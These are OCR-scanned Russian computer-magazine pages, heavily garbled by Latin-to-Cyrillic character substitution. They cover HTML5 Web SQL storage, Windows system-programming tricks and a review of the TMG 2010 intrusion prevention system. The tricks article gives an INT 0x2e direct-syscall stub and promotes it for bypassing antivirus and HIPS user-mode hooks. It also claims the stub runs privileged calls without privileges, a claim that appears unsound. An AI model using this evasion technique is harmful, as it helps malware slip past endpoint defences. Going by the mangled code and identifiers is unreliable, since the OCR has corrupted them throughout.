мисту. Пятая версия НТМІ_ приносит нам еще один подарок— воз- 
можность пользоваться автономной ЗОЫіе базой данных. Стоп! 
Получается, что все данные будут храниться на компе пользователя? 
Да, именнотак. Не нужно поднимать крик, что это небезопасно. Для 
определенных проектов эта возможность вполне может сгодиться. К 
сожалению, пока не все браузеры позволяют работать с этой базой. 
Например, ІЕ9 и ЕЕ4 пока такой возможности не имеют, такчто по- 
знакомиться с фишкой на практике можно разве что в Ооодіе СЬготе. 
Я не стану приводить пример реального кода, а покажулишь общий 
принцип работы: 

ІіИІБ.сІЬ = орепОаІіаЬаБеС'хакер'Д "1.0", 'ЧеБ*", 8192); 
Ііх.ехесиІіеБдІС'сгеаІіе туІіаЫе і-Р по* ехІ5*5 " + 
м сІіескіп5(ісІ іп*е§еп ргітагу кеу эбс, Ріе1сІ_питЬег_опе б*гіп§)", 
[], -Рипс1:іоп() { соп5о1е.1о§("Запрос успешно выполнен"); }); 

); 



Повнимательнее присмотревшись к приведенному выше примеру, ты 
заметишь, что в целом работа со встроенной БД происходитточнотак 
же, как и с обычным ЗСНЛе: открываем базу, готовим текстзапроса и 
выполняем его. 

НТМ15.5ЬиМоѵтО 

Применять НТМБ5 в своих проектах или нет — делотвое. Я считаю, 
что сейчассамое время. Еслиты профессионально занимаешься 
разработкой сайтов, то не ленись встраивать НТМБб-фишки уже 
сейчас. Само собой, не забывай заботиться о совместимости — 
реализовывай поддержку, как для современных браузеров, так и для 
устаревших. Утебя для этого есть все необходимое (смотри врезки). 
Нетормози и старайся, чтобы твои проекты выделялись на фоне 
остальных. Удачи! т 
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О В этой статье речь пойдет о системных программистских трюках, которые помогут тебе сде- 
лать свой код более четким, легким и красивым с хакерской точки зрения. Да! Теперь твой код 
будет вызывать зависть коллег по цеху и повышенное внимание противоположного пола (лето 
влияет :)), а также в разы повысит твою самооценку. 




зегаѵепсісіо! 



Хороший лозунг чилийских революционеров, как считаешь? В ѴѴіпсІоѵѵз 
все (ну или почти все) построено на привилегиях, посколькулюбой код, 
исполняющийся в системе, так или иначе обладает строго определен- 
ными возможностями. 

Я сейчас не имею в виду разделение ядра и юзермодного кода. Речь 
идето привязке кода ксистеме пользовательских привилегий в 
ѴѴіпсІоѵѵз потипу«Все вокруг п ******ы, один я Д’Артаньян». То есть, 
в винде существует довольно сложный механизм, который только и 
делает, что проверяет, можешь ли ты выполнить определенный код 
или нет. Для этого даже предусмотрен механизм получения при- 
вилегий — вызовытакихѴѴіпАРІ-функций как РНАсІщзіРгіѵіІеде, 
АбщзГГокепРгіѵіІедез и прочих. Кпримеру, просто так вызвать ѴѴіпАРІ 
ЕхііѴѴіпсІоѵѵзЕхО у нас не получится, для этого вызывающий код должен 
обладать соответствующими привилегиями, что в классическом вари- 
анте выглядит вотта ким образом (код поскипан): 



ѴОЮ зи1:сІоып5у5І:ет() 

{ 

ІТ ( !0репРгосе55Токеп(Се1:Сиггеп1:Ргосе55() , 
Т0КЕІ\І_А0;]ІІ5Т_РКІѴІІ_ЕСЕ5 | ТОКЕІ\І_(21ІЕКѴ, Шокеп)) 

ІоокирРгіѵі1е§еѴа1ие(І\ІІІІ_Щ 5Е_5ШТ00ЫІ\И\ІАМЕ, 
&1:кр.Ргіѵі1е§е5[0] . І_иісІ); 
ікр.Ргіѵі1е§еСоип1: = 1; 

ікр.Ргіѵі1е§Ѳ5[0].А1:1:гіЬи1:е5 = 5Е_РКІѴІІ_ЕСЕ_ЕМАВІ_Е0; 
АсІди5І:ТокепРпіѵі1е§е5(ІіТокеп, РАІ_5Е, &1:кр, 0, 
(РТ0КЕ^КІѴІІ_ЕСЕ5)ШІ_Щ 0); 

ІТ ( ! ЕхіТ1лііпсіом5Ех( . . . ) ) 

} 

Идея, заложенная разработчиками ѴѴіпсІоѵѵз в данном (или любом 
другом похожем) коде, в принципе абсолютно нормальна, понимаема 
и адекватна: нет привилегий для выполнения операций — попро- 



буй их получить! При этом все делается исключительно из благих 
намерений — защитить систему от несанкционированных действий 
(или кривых ручек) пользователя, могущих нанести ущерб безопас- 
ности системы. Кпримеру, начиная с ѴѴіпсІоѵѵз Ѵізіа все исполняемые 
программы по дефолту не имеют администраторских прав. В честной 
системе для увеличения своих прав нужно их честно запрашивать. 

Но мы жить честно не привыкли, нам нужно все, сразу и много, ведь 
верно? :). В общем, как гласит одна популярная поговорка: «Если 
нельзя, но очень хочется, тогда можно». Таки поступим, причем са- 
мыми простыми средствами, без всякиххитрых изворотов, перехва- 
тов, сплайсинга, недокументированных функций и прочих ненужных 
в нашем случае вещей. 

«Как та кое возможно?», — спросишь ты. Сейчас увидишь, как выпол- 
нить привилегированный код, не получая привилегий. Итак, долой 
привилегии! 

Как ты знаешь, определенная часть важных системных функций, 
представленных в кегпе132.сІ II и пісііі.сііі, являются так называе- 
мыми форвардингами. То есть, определенные функции в кете132. 
сІИ и пШ.сІІІ на самом деле являются «заглушками». Например, 
создание файла происходит примерно так: кегпе132 ! СгеаіеРі ІеѴѴ -> 
пІсИИЖСгеаІеЕіІе -> [вызов ІКІТ 0х2е] -> пІоз!2ѵѵСгеаІеЕіІе -> (...). 
Наблюдение за системой в различных условиях показало, что при 
штатном вызове системных І\и*-функций прямое обращение с 
соответствующими параметрами напрямую кобработчику пре- 
рывания ІЫТ 0х2е позволит вызывающему обойтись без вызовов 
кегпе132 ІСгеаіеРіІеѴѴ или пІсІШМіСгеаІеЕіІе. Таким образом, все, 
что нам нужно — это напрямую дернуть ІІ\ІТ 0х2е, передав обработ- 
чику этого прерывания нужные параметры. И что самое забавное 
— такойтрюк пройдет без получения необходимых привилегий, 
достаточно просто вызвать приведенный ниже код из своей про- 
граммы! Добавлю, что прерывание ІЫТ 0х2е появилось начиная с 
ѴѴіпсіоѵѵб 2000. И хотя с ѴѴіпХР была введена специальная инструк- 
ция 5У5ЕЫТЕР, ради совместимости прерывание ІЫТ 0х2е было 
оставлено. 

Код очень прост, он всего лишь повторяетто, что делает сама система: 

сІесІБрес(пакесІ) ІМТ5ТАТІІ5 ссіесі І\І1:Са1151:иЬ( 

іп ШОІМС ЗсІіЫитЬепО-РРипс^ . . . ) 
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Дичаем функции пЫ1І!НТУіе1<ШхесиТіоп: 


« ТехТ : 7с90сІ^Ье; 


— 5ЦВЕ0ЦТІНЕ — 


, ТехТ:7с90гі^Ье 




* ТехТ : 7с90сІ;ЁЬе 


риЫіс ЫТУіеІсІЕхесиТіоп 


. ТехЪ:7с90сІ^Ъе 




. ЬехС:7с90с1^Ье 


ЫТУіеХсІЕхесиЬіоп ргос леаг 


♦ Ь*хТ:7с90сІ^Ъе 


тоѵ еах, 116К 


. ЪехТ:7с90<ЯІ:сЗ 


тоѵ е<Іх, 0х7^іе0300 


* Тех С : 7с90сі^с8 


саіі сіѵгогсі рТг [е<1х] 


. ТехТ:7с90<і^са 


геТп 


. ТехТ : 7с90сіі:са 


ЫТѴіеІсіЕхесиТіоп емсір 


, Техі: : 7с90<Я^са 




116Ь - это просто номер функции ИТТіоІгіЕхесцТіоп 



{ 

азт 

{ 

тоѵ еах, [евр+4] 

Іеа есіх, [евр+8] 

іпі: 0х2е 

геі: 

} 

} 

// здесь 5(ЙІ\ІитЬегО-РРипс - номер І\І1:*-функции 
// в таблице 550Т 

Таким вот нехитрым способом можно вызвать любую 
І\ІТ*-функцию без всякой РиАсфизіРгіѵіІеде. Не веришь? 
Попробуй сам. Правда, на х64-битных системахуказан- 
ный код работать не будет, поскольку там для вызова 
шлюза используется команда 5Ѵ5ЕІМТЕН (думаю, ты без 
труда справишься и с этим, написав универсальную 
обертку под 5У5ЕЫТЕР). В качестве полезнейшего по- 
бочного эффекта вызова нужных функций через шлюз 
ІІЧТ 0х2е хочу отметить следующее: этот способ можно 
использовать для обхода перехваченных юзермодных 
функций. Ну, к примеру, решили мы что-то записать в 
реестр через вызов ѴѴіпАРІ — ЖСгеаІеКеуО. Эта функция 
экспортируется пісШ.сШ., и «правильные» аверы пере- 
хватывают ее (впрочем, каки все другие функции для 
работы с реестром). Если посмотреть в отладчик, то 
можно увидеть, что вызов ЫЮгеаІеКеу представляет со- 
бой в конечном итоге лишь передачу входных параме- 



тров функции шлюзу ІЫТ 0х2е с номером самой функции. 
Параметры будут переданы в свою очередьуже кернел- 
функции ХѵѵСгеаІеКеу, которая создаст новый ключ в 
реестре. По логике аверов, если перехватить функцию 
пІбІЫШЖСгеаІеКеу, то ее вызывающий обязательно 
попадется в ловушку авера. Но нетут-то было... Если об- 
ратиться напрямую кшлюзу, то перехватчик, установлен- 
ный на вызове ЖСгеаІеКеу, останется в неведении, что 
кто-то подлез под него, и со спокойной душой творит свои 
темныедела. Кбольшой головной боли разработчиков 
всякихтам хипсов, проактивоки аверов, теперь чтобы 
обойти хук пІбІЫШЖСгеаІеКеу достаточно вызвать вы- 
шеуказанную обертку обработчика ІІ\ІТ 0х2е. Такойтрюк, 
во-первых, не требует получения возможных привилегий 
для своего вызова, а во-вторых на самом деле вызовет 
системную АРІ ЫіСгеаІеКеуО и тем самым посадит в лужу 
половину аверов, которые все еще надеются перехватить 
вызов опасных для системы юзермодных функций. Хотя 
справедливости ради надо признать, что для отлова 
такиххитропопых вывертов нужно лишь перехватить ІЫТ 
0х2е (или 5Ѵ5ЕІМТЕП). Это делают наиболее продвинутые 
антивирусы, однако далеко не все. 

Трюк #2, или свой антивирус 
на скорую руку 

Основываясь на первом трюке, можно в течение пары 
дней или нескольких часов (при наличии прямых рук, 
разумеется, и исходников с диска) соорудить некое 
реалистичное подобие проактивной защиты, которая с 




> СІѴСІ 

На БѴБ ты найдешь 
приведенный в статье 
код, который поможет 
тебе создать свою 
проактивку. 



Г'ІПіі 



1 НТТР://ѴѴѴѴѴѴ 



> Ііпкз 

Блог главного раз- 
работчика ЕеасЮЭ 
Алекса Ионеску (море 
интересной и увлека- 
тельной инфы о вну- 
тренностях ѴѴіпсІоѵѵз): 
аіех-іопезси.сот 
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Ди заем функции 1сегпе132 іНгіЬеРгосеззМепюгу і 


. Ьехк. : 7СВ0225А 


Іеа 


еах , [еЬр+ѵаг 4] 


. ЕехЪ. : 7С802250 


ризЬ 


еах 


. ЬехЬ: 7С80225Е 


Іеа 


еах, [еЬр+ѵаг 8] 


. Ъехі : 7С802261 


ризЬ 


еах 


♦ ЬехЪ : 7С802262 


ризЬ 


есіі 


. ЬехЬ г 7С802263 


саіі 


езі ; N ЬРго Ь ес Ь Ѵі г іиа Шелюгу 


. Ьехі : 7С802265 


Іеа 


еах , [ еЪр+ІіРгосез з I 


. ЕехЪ. : 7С802268 


ризЬ 


еах 


. Ьехі : 7С802269 


ризЬ 


еЬх 


. ЦехЬ : 7С80226А 


ризЬ 


[еЬр+ІрВи^ег] 


т ЬехЪ : 7С802260 


ризЬ 


[ еЬр+ІрВазеАсШгезз ] 


. ЪехЪ : 7С802270 


ризЬ 


е<1і 


. Ьех*: : 7СВ02271 


саіі 


(І5 : ЫЬТТгі^еѴігІиаІМетогу 


. ЪехЪ : 7С802277 


шоѵ 


есх, [еЬр+ІрЫитЪегО^ВуІіезНгіЪЬеп] 


На листинге 


хорошо 


видно , что вызов ЯхіЪеРгосеззМетоху 


приводит к 


вызову функции НЬНгіЪеѴіг^иаІМеійогу 



очень большой вероятностью сможет определить наличие юзер- 
модных перехватов системных функций. В основе данной «проак- 
тивки» будет лежать независимое вычисление и анализ стартовых 
адресов потоков, а также проверка пролога функций на предмет не 
установлен ли в первых пяти байтах функции ЛІМР куда-то-там- 
далеко. 

( ІбгеасІНапсІІе = ОрепТбгеас1(ТНКЕАО_СЕТ_СОІ\ІТЕХТ, РАІ_5Е, 
сиггТІігеасІЕпІігу.ІРШТІігеасІЮ ) ) 

{ 

51:аг1:АсІсІге55 = 6е1ТІігеасІ51:агІ:АсІсІге55( ІІігеасІНапсІІе ); 
і-Р( ( 51;ап1:АсІсІге55 < 0x00401000 | | 

ЗІіагІАсІсІгеББ > 0x0040156В ) && 31:аг1:АсІсІге55 < 0x70000000 ) 

{ 

// подозрение на перехват 

} 

еізе 

{ 

№:Се1:Соп1:ех1:ТІігеасІ( ІІпгеасІНапсІІе., &сЪ< ); 

і-р( ( сІх.Еір < 0x00401000 | | сІх.Еір > 0x0040156В ) 

&& сІх.Еір < 0x70000000 ) 

// подозрение на перехват 

} 

І\І 1 :СІ 05 е( ІІігеасІНапсІІе ); 

} 

Здесь вызов МіОеіСопІехіТЬгеаб будет происходить напрямую через 
ІЫТ 0х2е с передачей номера функции и необходимых параметров. 
Полный код, реализующий портативную проактивку, ты сможешь 
найти на диске. В ее основе, какя уже отмечал, лежит возможность 
вызова необходимых функций непосредственно через ІЫТ 0х2е. 

Трюк#3,или 

свои таііос/геаіюс в ядре 

Действительно, если плаііос можно заменить на ЕхАНосаІеРооІ, то 
окажется, что аналога такой функции как геа Нос в ядре нет. Что же 



делать? Рекомендую реализовать свой аналог та Нос/ геаііос, тем 
более что они оказываются крайне простыми и являют собой про- 
сто оболочку под вызов функции ЕхАІІосаІеРооІѴѴііЬТад (функция 
ЕхАІІосаІеРооІ, по утверждению М50Ы, является устаревшей, и ее 
рекомендуется заменить на ЕхАІІосаІеРооІѴѴііЬТад). 

ѴОЮ * та11ос(ІІІ_ОІ\ІС зііе) 

{ 

РѴОЮ сіаіа = 0; 

сіаііа = ЕхА11оса1:еРоо1ІлІі1:Ыа§(Ра§есІРоо1, зіге, "Та§"); 
тегг)5е1:( сіаіга „ 0x0,, зііе); 
геііигп сіаііа; 

} 

И, соответственно, реализация псевдофункции геаііос: 

ѴОЮ * геаііос (РѴОЮ тетРІіщ ІЛ0ІЧ6 зііе, ІЛ0ІЧ6 оІсІЗііе) 

{ 

РѴОЮ пеыРІг = 0; 

пемРІіг = ЕхА11оса1іеРоо1ІлІі1іЬТа§(Ра§есІРоо1, зіге, "Та§"); 

ІТ( ІпеыРІг ) 

геішгп 0 ; 

ІТ ((оІсІЗііе) && (тетРІг)) 

{ 

К1і1МоѵеМетогу( пемРТг., тетРІіщ оІсІЗііе); 
ЕхРгееРооІ(тетРІіг) ; 

} 

геішгп пемРІіг; 

> 

Заключение 

Не стоит принимать все написанное всерьез, но думаю, что идеи, 
приведенные в статье, тебе понравятся, и ты сможешь найти им до- 
стойное применение. 

Удачного компилирования и да пребудет с тобой Сила! □□ 
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6 номеров 564 руб. 
13 номеров 1105 руб. 




6 номеров 810 руб. 
12 номеров 1470 руб. 



6 номеров 785 руб. 
12 номеров 1420 руб. 



6 номеров 1110 руб. 
12 номеров 2016 руб. 









6 номеров 1 260 руб. 
1 2 номеров 2200 руб. 



6 номеров 1 260 руб. 
12 номеров 2310 руб. 



6 номеров 900 руб. 
12 номеров 1720 руб. 



6 номеров 1300 руб. 
1 2 номеров 2300 руб. 



ПОДПИШИСЬ! 

зНор.дІс.ги 



ВЫГОДА + ГАРАНТИЯ 

Редакционная подписка без посредников - это 
гарантия получения важного для Вас журнала и 
экономия до 40% от розничной цены в киоске 

8 - 800 - 200 - 3-999 




□ІЮ 









6 номеров 1130 руб. 
1 2 номеров 2060 руб. 



6 номеров 890 руб. 
12 номеров 1630 руб. 



6 номеров 630 руб. 
12 номеров 1130 руб. 



6 номеров 765 руб. 
12 номеров 1380 руб. 







6 номеров 960 руб. 
12 номеров 1740 руб. 



6 номеров 1 300 руб. 
1 2 номеров 2300 руб. 



3 номера 630 руб. 

6 номеров 1140 руб. 



6 номеров 1 260 руб. 
1 2 номеров 2200 руб. 




6 номеров 2205 руб. 
1 2 номеров 3890 руб. 



6 номеров 21 50 руб. 
1 2 номеров 3930 руб. 



6 номеров 2178 руб. 
1 2 номеров 3960 руб. 



(дате)іаіиі 

МЕДИА ДЛЯ ЭНТУЗИАСТОВ 


















ЗУИ/АСК 



■ ■ Анна Лучник 




Система 

предотвращения 
вторжений 
ТМС 



в 



2010 



Разбираем ТМС, N13, САРА и другие сокращения 

Все сложнее представить компанию, которая не использует интернет в своей работе. Разумеется, 
через интернет компьютеры компании подвергаются атакам как хакеров, так и вредоносного ПО. 
Все это приводит к усложнению средств безопасности и добавлению к ним новых компонентов. 



Системы предотвращения вторжений позволяют выявить сигнатуру 
известной атаки или аномальную для системы активность, кото- 
рая также может быть атакой. В статье будет рассмотрена система 
предотвращения вторжений, интегрированная в ТМС 2010. 

Возможности ТМС 2010 

На смену І5А 2006 пришел ТМС (Тйгеаі: Мапа^етепі: СаГеѵѵау) 2010 — 
программный продукт семейства Рогеігопі:, включающего в себя раз- 
нообразные решения для обеспечения безопасности. ТМС в большей 
степени ориентирован на обеспечение безопасного доступа корпо- 
ративных пользователей к глобальной сети и их защиты от внешних 
угроз. ТМС 2010 включает в себя межсетевой экран, ѴРЫ, систему 
предотвращения вторжений и позволяет осуществлять проверку на 
наличие вредоносных программ и фильтрацию Ш1-адресов. 

Что же изменилось и что добавилось в новой инкарнации І5А- 
сервера? ТМС можно установить только на 64-битные ОС, при этом 
ѴѴіпсІоѵѵз Зегѵег 2003 не поддерживается. Также ТМС нельзя устано- 
вить на контроллер домена. 

С точки зрения настройки ТМС в качестве межсетевого экрана, 
принципиальных изменений, по сравнению с І5А 2006, нет - всё те 
же правила доступа и публикации, сетевые объекты, расписания и 
протоколы (рис. 1). 

Появился отдельный раздел, посвященный настройке ѵѵеЪ-доступа 
(рис. 2) . С точки зрения обнаружения вторжений в разделе УѴеЪ 
Ассезз Роіісу важна новая возможность проверять исходящий НТТР5- 
трафик. При этом сохранилась возможность проверять входящий 
ЗЗЬ-трафик, используя ЗЗЬ ЪгісІ§іп§. НТТР8 ішресгіоп (рис. 2) по- 
зволяет минимизировать вероятность обхода системных политик 
путем туннелирования трафика через защищенное соединение, но 
сама возможность реализуется через атаку Мап-іпчйе-тісісііе. Для 
этого генерируется специальный сертификат (НТТР5 ішресгіоп 
сеггігісаіе) , который должен быть добавлен в хранилище доверенных 
корневых сертификатов на всех клиентах. НТТР8 ішресгіоп не ра- 
ботает с 88ТР-соединениями и самоподписанными сертификатами 
- такие ресурсы необходимо добавлять в раздел исключений. Нужно 
учитывать, что при использовании НТТР5 ішресгіоп сертификаты 
не проходят проверку ЕхГепсІесІ Ѵаіісіагіоп (ЕѴ) ЗЗЬ, как следствие — 



современные браузеры не будут окрашивать в зеленый цвет строку с 
адресом сайта. 

Через новый раздел Е-Маіі Роіісу можно настраивать антиспам- и 
антивирусную проверку почты. Для удаленного доступа добавлена 
поддержка протокола 88ТР. 

Существовавшие раньше настройки по защите от распространенных 
сетевых атак (рис. 3), блокировке неиспользуемых ІР-опций и фраг- 
ментов пакетов, а также ограничения на количество одновременных 
сессий и запросов на соединения переместились в раздел Вейаѵіогаі 
Іпітшіоп Эе1:есгіоп (рис. 4) . По сравнению с І8А 2006 добавилась воз- 
можность подключения поддержки ІРѵб при работе ТМС в качестве 
сервера Оігесі: Ассезз. И появилась возможность настраивать квоты 
для 8ІР (Зеззіоп Іпігіагіоп РгоШсоІ) . Самое главное, что в разделе 
Іпітшіоп Ргеѵепгіоп 5у§1:ет появилась полноценная сигнатурная 
сетевая система предотвращения вторжений — Ыеішогк Ішресгіоп 
5уз1:ет (N15). 



Системы предотвращения втор- 

Ж6НИИ 



Системы обнаружения вторжений (ІШтшіопЮеіесгіоп 5у§1:ет или 
ГОЗ) — это набор методов и инструментов (программных и аппарат- 
ных), позволяющих выявить и оповестить об активности, которая 
необычна для данной системы — нарушает политику, либо содержит 
ошибки или сигнатуры известных атак. Системы предотвращения 
вторжений (Іпітшіоп Ргеѵепгіоп Зузіетз — ІР5), в дополнение к 
возможностям ЮЗ, выполняют действия, способные предотвратить 
атаку. 

Традиционно ГОР5 делятся на системы, работающие на уровне сети, 
на уровне хоста и гибридные. Сетевые ГОР5 (Ией/ѵогк Вазесі ГОР5 — 
ЫГОР5) анализируют сетевой трафик с целью выявить в нем атаки 
и подозрительную активность. ГОР5 на уровне хоста (Но$1: Вазесі 
ГОР5 — НГОР5) отслеживают параметры конкретного узла (такие 
как журналы приложений и ОС), системные вызовы, изменения на 
уровне файловой системы. 

В ГОР5 для обнаружения атак используются сигнатуры, выявление 
аномалий или политики. Апотаіу Вазесі ГОР5 и Роіісу Вазесі ГОР5 
позволяют выявить ранее не известные атаки, но обладают более 
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6 . 5йК и инструменты для диагностики и настройки ТМО 2010: 
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высоким уровнем ложных срабатываний и большей сложностью 
настройки, чем сигнатурные. На практике около 80% атак нарушают 
правила использования протокола, поэтому для обнаружения атак 
на сеть хорошо использовать системы, основанные на анализе про- 
токола. 

Ыеіѵѵогк Іпзресгіоп 5у$+ет (N15) 

В основе N15 лежит анализатор протоколов — Сепегіс Арріісагіоп 
Ьеѵеі РгоШсоІ Апаіугег (САРА), разработанный Місгозоіі: КезеагсЬ. 
(МЗК) . САРА включает в себя язык для описания спецификации 
протоколов — САРА Ьап§иа§е (САРАЬ) , а также механизм для 
анализа потоков или захваченных сетевых данных. К отличиям 
N15 от других систем обнаружения вторжений (ГО5) можно от- 
нести стиль программирования. Если большинство ГОР5 написа- 
ны на императивных языках (например, С или С + + ), то в САРА 
предпринята попытка реализовать логику разбора протоколов в 
декларативном стиле. 

N15 является сигнатурной ІР5, основная задача которой — сокра- 
тить время между обнаружением уязвимости и применением патча 
с нескольких недель до нескольких часов. Например, при обнару- 
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•Місгозоіі Сегііііесі Ргоіеззіопаі (МСР) 

•Місгозоіі Сегііііесі Вузіетз Абтіпізігаіог: 
5есиг1у (МС5А: 5есиг1у) 

• Місгозоіі Сегііііесі Вузіетз Епдіпеег: Еесигііу 
(МС5Е: 5есиг1у) 

• Місгозоіі Сегііііесі Тесбпоіоду 5ресіаІізЕ ѴѴіпбоѵѵз 5егѵег 2008 
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• Місгозоіі СегііііесІ Тгаіпег (МСТ) 

• Огасіе СегііііесІ Аззосіаіе (05А) 

• Огасіе СегііііесІ Ргоіеззіопаі (ОСР) 

женин уязвимости в ОС создание, отладка, тестирование и приме- 
нение обновления ко всем компьютерам сети может потребовать 
значительного времени. В случае сигнатур время, необходимое на 
создание самой сигнатуры, меньше, а кроме того — не требуется 
время на развертывание обновлений на тестовых компьютерах, 
чтобы убедиться в сохранении полноценной работы системы. Таким 
образом, при настроенной N15 в случае существующей неисправ- 
ленной уязвимости можно значительно меньше волноваться о 
безопасности. Но надо учитывать, что на данный момент сигнатуры 
N15 могут детектировать эксплойты, направленные на уязвимости 
только в продуктах Місгозоіі:. Кроме того, N15 защищает только от 
сетевых или ѵѵеЪ-атак, но не защищает от эксплойтов в файлах. По- 
следнюю проблему можно решить с помощью другого компонента 
ТМС — Маіѵѵаге Іпзресгіоп. 

N15 может работать со следующими протоколами: НТТР, 

5МВ, М5КРС, 5МТР, РОРЗ, ІМАР, МІМЕ. При появлении новых атак 
или распространении новых протоколов может быть добавлена 
поддержка новых протоколов, предоставляемая через новый на- 
бор сигнатур. Чтобы просмотреть протоколы, поддерживаемые 
в системе, можно использовать соответствующую группировку 
(рис. 5) . Если пользователь добавляет свои определения про- 
токолов, использующие нестандартные порты, то для проверки 
пакетов с помощью N15 необходимо ассоциировать данный ЕГзег 
Пеііпесі РгоЮсоІ со стандартным протоколом, поддерживаемым 
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Рис. 1. Консоль РогейопіТЛЛС Мападетепі 



N15. N15 сканирует только тот трафик, который разрешен в 
Рігеѵѵаіі роіісу. 

Кроме использования сигнатур, можно включить обнаружение ано- 
малий в протоколах и настроить действия при их обнаружении (рис. 
6) . Значение по умолчанию — «АПоѵѵ, хо аѵоіб Ыоскіп§ 1е§ігітаі:е 
йгаШс» — пропускает трафик, даже если в нем были аномалии, 
при этом никаких оповещений и записей в журналах не создается. 
Аномалией считается трафик, который отличается от стандартов 
или распространенных реализаций. Так как реализация протоколов 
может отличаться от КРС, то существует вероятность блокировки 
допустимого трафика при задании параметра «Віоск, Хо гі^ІЦеп 
Бесигпу». 

Конфигурирование N1$ 

Установка ТМС 2010 не представляет особых сложностей. Можно 
запустить Ргерагагіоп Тооі, который загрузит и установит необходи- 
мые компоненты (например, .№і:Ргатеѵѵогк 3.5.1), а потом запустит 
Іпзіаііаііоп ѴѴігагсІ. После установки, при прохождении первого шага 
СеШп§ 5ШП:есі ѴѴігагсІ, есть вероятность возникновения ошибки «N 0 
пейлгогк а<3ар1:ег$ соиЫ Ье ібещШесІ». Ошибка может быть вызвана 
тем, что из-за настроек безопасности ТМС не может получить доступ 
к необходимым службам. Решить проблему можно пройдя 5есигііу 
Сопіі^игайоп ѴѴігагсІ (5СѴѴ), в котором предварительно была добав- 
лена поддержка роли ТМС 2010. 

Настроить и включить N15 можно через СеШп§ 5іаП:е<і ѴѴігагсІ, кото- 
рый запускается сразу после установки или вызывается как задача 
из Коіез Сопіі^игагіоп. На рис. 7 можно увидеть все задачи, которые 
применимы к N15 или отдельным сигнатурам. В свойствах N15 есть 
четыре вкладки (рис. 6) . На первой можно включить или выключить 
N15. При включении N15 необходимо учитывать дополнительную 
нагрузку — так, среднестатистический трафик может добавить 30% 
загрузки процессору. Чтобы минимизировать использование ре- 
сурсов, на второй вкладке можно исключить из сканирования часть 
трафика. В исключения можно добавить любые сетевые объекты, 
такие как сети, компьютеры, диапазоны адресов или наборы имен 
доменов. Входящий или исходящий трафик для заданных в исклю- 
чениях сетях не будет сканироваться N15. Исключения, заданные с 
помощью Нотаіп №те 5еЦ применяются только к Ьир-трафику. Две 




Рис. 2. Настройки ѴѴеЬ Ассезз Роіісу 



последние вкладки окна N15 Ргореггіез посвящены настройкам для 
всех сигнатур и заданию реакции на аномалии. 

Существуют специальные сигнатуры для тестирования работо- 
способности N15, которые относятся к категории ОЛег. Названия 
таких сигнатур начинаются со слова Тезі:. Для срабатывания те- 
стовой сигнатуры Тез1::ѴѴіп/М5.НТТР.5і§па1:иге!0000-0000 необ- 
ходимо с компьютера, выступающего в роли клиента 5еси^еNАТ 
или ТМС, набрать в браузере Ьир://\л/\лл/ѵ.соп^о50.сотЛе5^МІ5. 
а5рх?1ез1Уа1ие=1 !2Ш4$5%6 л ГШі5-Те5І:-ЦР1_}11 !2Ш4$5%6 л .При 
правильной настройке N15 заблокирует соединение с кодом ошибки 
(12234) . Другие тестовые сигнатуры относятся к протоколу 5МВ. 
Подробное их описание можно найти на портале Маіѵѵаге РгоГесгіоп 
СеШег, перейдя по ссылке с вкладки Неііаііз для соответствующей 
сигнатуры. 

Более полное тестирование можно провести с использованием 
сетевых сканеров или сканеров уязвимостей (рис. 8) . В этом случае 
необходимо разрешить соответствующий трафик, чтобы к нему было 
применено сканирование N15. В противном случае будет проверена 
корректность настройки Рігеѵѵаіі Роіісу (рис. 9) . 
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Рис. 3. Настройка обнаружения распространенных 
сетевых атак 

Сигнатуры N15 

Существует три типа сигнатур: ѵиІпегаЪіІкуЪазесІ (обнаруживаю- 
щие разнообразные варианты использования конкретной уязвимо- 
сти), ехрІокЪазесІ (нацеленные на конкретный эксплойт) и роіісу 
Ъазесі (использующиеся в основном для аудита, когда нельзя создать 
сигнатуры первых двух типов) . 

При использовании сигнатур главная задача — поддерживать 
их в актуальном состоянии. С одной стороны, важно загружать 
обновления, с другой — необходимо, чтобы эти обновления вовремя 
появлялись, то есть появлялись как можно быстрее после объявле- 
ния о новой уязвимости. Исследованием обнаруженных и поиском 
новых уязвимостей, а также разработкой новых сигнатур занимается 
Місгозой: Маіѵѵаге РгоГесгіоп Сетег (ММРС) . Помочь ММРС мож- 
но, приняв участие в Теіетеіту 5егѵісе. В этом случае в свойствах 
РогейгоШ: ТМС нужно выбрать способ участия. В варианте Ва$іс 
МетЪегзЫр в Місгозой отправляется информация о потенциальных 
угрозах, их происхождении и предпринятых действиях. В варианте 
Абѵапсесі МетЪегзЫр дополнительно отсылаются примеры трафика 
и полные ІЖЬ, что дает значительно больше информации для анали- 
за. 

Настроить загрузку новых сигнатур можно в окне N15 Ргореггіез на 
вкладке Эейпкюп ПрсіаГез, выбрав один из трех вариантов обнов- 
ления: проверять и устанавливать (рекомендованный вариант), 
только проверять появление новых сигнатур или ничего не предпри- 
нимать. Можно задать частоту проверки появления новых сигнатур 
и указать количество дней, через которое генерируется предупре- 
ждение, что сигнатуры не обновлялись. Параметр АиЮтагіс ро11іп§ 
йэдиепсу применяется только к N15, для остальных компонентов 
ТМС необходимо производить настройки через Прсіаііе СеЩег. 

Новые сигнатуры будут использованы только при проверке новых 
соединений, что необходимо учитывать при наличии длительных 
соединений, таких как ѴРИ. Также в окне N15 Ргореггіез можно задать 
Кезропзе роіісу для всех новых сигнатур. Рекомендуется выбирать 
вариант Місгозой: сМаик роіісу, в этом случае новые сигнатуры 
будут использовать политики, которые были заданы ММРС. Есть 
еще два варианта: только журналировать и не блокировать трафик 
с обнаруженной сигнатурой феііесі: опіу гезроше), или вообще от- 
ключить сигнатуру (N 0 ге$роп$е или ЭкаЫе $і§паШге) . N15 позволяет 
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использовать старые наборы сигнатур, если они доступны локаль- 
но. Для использования старого набора надо на вкладке Оейпкіоп 
Црсіаіез выбрать Ѵегзіоп Сопітоі. При использовании старого набора 
новые сигнатуры не используются в процессе сканирования трафи- 
ка. И каждый раз при появлении обновлений будет генерироваться 
предупреждение об использовании неактуального набора сигнатур. 
У сигнатуры не так много настроек. Ее можно включить или отклю- 
чить, написать комментарий и задать реакцию на обнаруженную 
атаку, отличную от настроек по умолчанию. Настройки можно при- 
менять как к одной сигнатуре, так и набору сгруппированных сиг- 
натур. Сигнатуры можно группировать по следующим признакам: 
Аиепгіоп Кециігесі, Кезропзе, Роіісу Туре, Визіпезз Ітрасі:, Саіе§огу, 
Эаіе РиЫізЬесІ, 5еѵегіГу, РібеШу, РгоШсоІ или 5ШШ5. 

Настройка параметров сигнатур влияет на вложенные протоколы. 
Так, параметры, заданные для сигнатур НТТР, могут оказать влияние 
